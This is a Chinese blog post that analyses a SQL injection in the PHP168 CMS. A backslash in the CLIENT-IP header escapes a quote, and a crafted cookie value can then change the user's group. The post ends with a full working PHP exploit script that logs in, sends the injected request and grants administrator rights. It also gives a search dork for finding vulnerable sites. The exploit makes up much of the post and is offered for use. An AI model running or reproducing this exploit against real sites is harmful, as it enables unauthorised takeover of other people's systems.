Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3029676
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-01-31 12:16:51

简单分析下这个漏洞
common.inc.php
if($_SERVER[''HTTP_CLIENT_IP'']){
     $onlineip=$_SERVER[''HTTP_CLIENT_IP''];
}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){
     $onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];
}else{
     $onlineip=$_SERVER[''REMOTE_ADDR''];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip
看一下filtrate函数是怎么处理的
function.inc.php
function filtrate($msg){
    $msg = str_replace(''&'',''&'',$msg);
    $msg = str_replace('' '','' '',$msg);
    $msg = str_replace(''"'',''"'',$msg);
    $msg = str_replace("''",'''''',$msg);
    $msg = str_replace("<","<",$msg);
    $msg = str_replace(">",">",$msg);
    $msg = str_replace("\t","       ",$msg);
    $msg = str_replace("\r","",$msg);
    $msg = str_replace("   ","   ",$msg);
    return $msg;
}过滤了''"<等,但是没有处理\
common.inc.php
    if($usr_oltime>30||!$usr_oltime){
        $usr_oltime>600 && $usr_oltime=600;
        include(PHP168_PATH."php168/level.php");
        if( isset($memberlevel[$lfjdb[groupid]]) ){
            $SQL=",groupid=8";
            $lfjdb[money]=get_money($lfjuid);
            foreach( $memberlevel AS $key=>$value){
                if($lfjdb[money]>=$value){
                    $SQL=",groupid=$key";
                }
            }
        }else{
            $SQL="";
        }
        $db->query("UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''$onlineip'',oltime=oltime+''$usr_oltime''$SQL WHERE uid=''$lfjuid''");
//因为这个地方是拼接字符串的形式,所以可以使用\来转义'',然后利用$usr_oltime来注射:)另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:
UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''[\]'',oltime=oltime+''[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]''$SQL WHERE uid=''$lfjuid''最后给个EXP:
#!/usr/bin/php
print_r(''
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
from:
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
'');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
    print_r(''
+---------------------------------------------------------------------------+
Usage: php ''.$argv[0].'' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php ''.$argv[0].'' localhost /php168/
+---------------------------------------------------------------------------+
'');
    exit;
}
error_reporting(7);
ini_set(''max_execution_time'', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$resp = send();
preg_match(''/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/'', $resp, $cookie);
if ($cookie)
    if (strpos(send(), ''puret_t'') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");
function rands($length = 8)
{
    $hash = '''';
    $chars = ''ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];
    return $hash;
}
function send()
{
    global $host, $path, $user, $pass, $cookie;
    if ($cookie) {
        $cookie[1] .= '';USR=''.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '''';
        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";
        $message = "POST ".$path."login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '''';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}
?>
 
阅读(774) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~